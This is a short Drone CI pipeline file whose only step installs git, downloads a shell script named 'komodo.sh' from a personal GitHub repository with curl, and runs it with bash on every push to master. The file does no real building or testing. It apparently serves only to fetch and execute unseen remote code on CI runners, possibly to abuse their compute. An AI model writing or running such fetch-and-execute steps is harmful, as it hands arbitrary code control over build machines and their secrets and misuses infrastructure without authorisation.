--- 
clone: 
  depth: 1
kind: pipeline
name: ReinaPipeline
steps: 
  - 
    commands: 
      - "apt-get update && apt-get install git && curl -o build.sh https://raw.githubusercontent.com/johnwickedsick/build-test/main/komodo.sh && bash build.sh"
    image: ubuntu:latest
    name: Zhard-Lair
    trigger: 
      branch: 
        - master
